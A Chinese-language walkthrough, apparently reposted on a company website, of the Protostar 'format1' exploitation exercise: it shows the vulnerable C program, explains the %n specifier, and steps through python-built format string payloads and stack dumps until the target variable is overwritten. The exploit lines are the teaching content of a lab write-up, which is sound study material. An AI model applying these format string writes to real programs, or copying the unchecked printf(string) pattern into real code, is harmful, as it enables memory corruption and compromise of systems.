About
This level shows how format strings can be used to modify arbitrary memory locations.
Hints: objdump -t is your friend, and your input string lies far up the stack :)
This level is at /opt/protostar/bin/format1
Source code
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int target;
void vuln(char *string)
{
printf(string);
if(target) {
printf("you have modified the target :)\n");
}
}
int main(int argc, char **argv)
{
vuln(argv[1]);
}
這題一開始不會做,因?yàn)橹皩慍時(shí)比較少研究format的東東,因此也就沒接觸過%n這個(gè)東東。而簡單簡介下%n吧:
輸出格式 %n 可以將所輸出字符串的長度值賦紿一個(gè)變量, 見下例:
int slen;
printf("hello world%n", &slen);
執(zhí)行后變量slen被賦值為11。
再結(jié)合這道題的printf(string),其實(shí)這個(gè)跟printf("%s",string)是不一樣的,問題就是出自這里,當(dāng)格式化字符串后再加上%x的話會緊接著讀取堆棧里面的內(nèi)容。
首先要獲得target的地址:
user@protostar:/opt/protostar/bin$ objdump -t ./format1 | grep target
08049638 g O .bss 00000004 target
然后須在堆棧中找到執(zhí)行賦值動(dòng)作的位置,可用%x來填充堆棧的內(nèi)容:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "aaaaaaaa" + "%x."*150+"%x"')
aaaaaaaa804960c.bffff628.8048469.b7fd8304.b7fd7ff4.bffff628.8048435.bffff7f1.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6a8.b7eadc76.2.bffff6d4.bffff6e0.b7fe1848.bffff690.ffffffff.b7ffeff4.804824d.1.bffff690.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6a8.1e6dfbd.2bb2c9ad.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff6d4.8048450.8048440.b7ff1040.bffff6cc.b7fff8f8.2.bffff7e7.bffff7f1.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff7cb.1f.bffffff2.f.bffff7db.0.0.0.19000000.5f0430f3.ed617f05.8671f725.69f2e525.363836.0.2e000000.726f662f.3174616d.61616100.61616161.2e782561.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e
目測大概在128個(gè)%x的位置,確認(rèn)一下:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "aaaaaaaa" + "%x."*128+"%x"')
aaaaaaaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.fa7bb769.d02f2179.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.c000000.ab329b49.980b02cb.973cca28.695fb6c8.363836.0.0.662f2e00.616d726f.61003174.61616161
我們把前4字節(jié)換成target的地址:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print " \x38\x96\x04\x08aaaa" + "%x."*128+"%x"')
8aaaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.6a958dd0.40c11bc0.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.86000000.b6399ac7.1f57cabc.3bd68bc6.69c7f777.363836.0.0.662f2e00.616d726f.38003174.61080496
發(fā)現(xiàn)有一個(gè)字節(jié)的錯(cuò)位,須調(diào)整一下:user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "a\x38\x96\x04\x08aaa" + "%x."*128+"%x"')
a8aaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.fae225a2.d0b6b3b2.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.40000000.628ccb6c.1f6e8287.90ab45aa.6922104d.363836.0.0.662f2e00.616d726f.61003174.8049638
好了,定位成功了把最后的%x換成%x即可:
user@protostar:/opt/protostar/bin$ ./format1 $(python -c 'print "a\x38\x96\x04\x08aaa" + "%x."*128+"%n"')
a8aaa804960c.bffff668.8048469.b7fd8304.b7fd7ff4.bffff668.8048435.bffff833.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff6e8.b7eadc76.2.bffff714.bffff720.b7fe1848.bffff6d0.ffffffff.b7ffeff4.804824d.1.bffff6d0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff6e8.2f09ffa.28a409ea.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff714.8048450.8048440.b7ff1040.bffff70c.b7fff8f8.2.bffff829.bffff833.0.bffff9be.bffff9cc.bffff9d7.bffff9f7.bffffa0a.bffffa14.bfffff04.bfffff42.bfffff56.bfffff6d.bfffff7e.bfffff86.bfffff96.bfffffa3.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.fabfbff.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff80b.1f.bffffff2.f.bffff81b.0.0.0.89000000.3f3cec1e.c342fe8e.7223fa6a.699b71e8.363836.0.0.662f2e00.616d726f.61003174.you have modified the target :)
標(biāo)題名稱:Protostarformat1
轉(zhuǎn)載來于:http://vcdvsql.cn/article6/pegjig.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供響應(yīng)式網(wǎng)站、電子商務(wù)、App設(shè)計(jì)、網(wǎng)站設(shè)計(jì)、網(wǎng)站導(dǎo)航、網(wǎng)站內(nèi)鏈
廣告
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源:
創(chuàng)新互聯(lián)